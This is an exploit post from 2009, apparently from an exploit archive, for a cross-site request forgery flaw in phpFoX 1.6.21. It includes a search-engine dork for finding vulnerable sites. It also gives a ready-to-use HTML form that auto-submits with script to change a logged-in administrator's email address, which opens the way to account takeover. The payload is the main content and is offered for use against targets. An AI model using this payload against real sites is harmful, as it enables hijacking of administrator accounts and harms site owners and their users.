phpfox1621-xsrf.txt

Posted on 16 March 2009
##########################################################################
#phpFoX Version 1.6.21 cross site request forgery exploit
####################################################################
#dork:Powered by phpFoX
#####################################################################
#found by d14l
######################################################################
#greetz to:soul,marcoj,al0xyz,stefo,aljosha,sp1r1t,invisible
#greetz to all good people from my country croatia
#############################################################################
#
#
#
#

phpFoX Version 1.6.21 suffers from cross site request forgery which allows attacker to change admins email





///////////////////////////code////////////////////////////////////////


<form method="post" action="[site]/account/settings/account/" onsubmit="return  validator_isValid(this, new Array( {'field':'aUser[email]','pattern':/^[0-9a-zA-Z_]([-.w]*[0-9a-zA-Z_])*@([0-9a-zA-Z][-w]*.)+[a-zA-Z]{2,}$/,'maxlen':255,'title':'E-mail'}), new Array(), new Array(), 'jsErr')">

<input type="text" name="aUser[email]" value="[email]" size="45" />

<input type="text" name="act[update]" value=" Save Account Settings " style="cursor:pointer;" class="mainmenu6" onmouseover="this.className='mainmenu7';" onmouseout="this.className='mainmenu6';" /></td>

</form>
<script>document.forms[0].submit()</script>


///////////////////////////////////////////////////////end////////////////////////
TOP
Malware :

None in database
Last 20
Exploits :

Last 20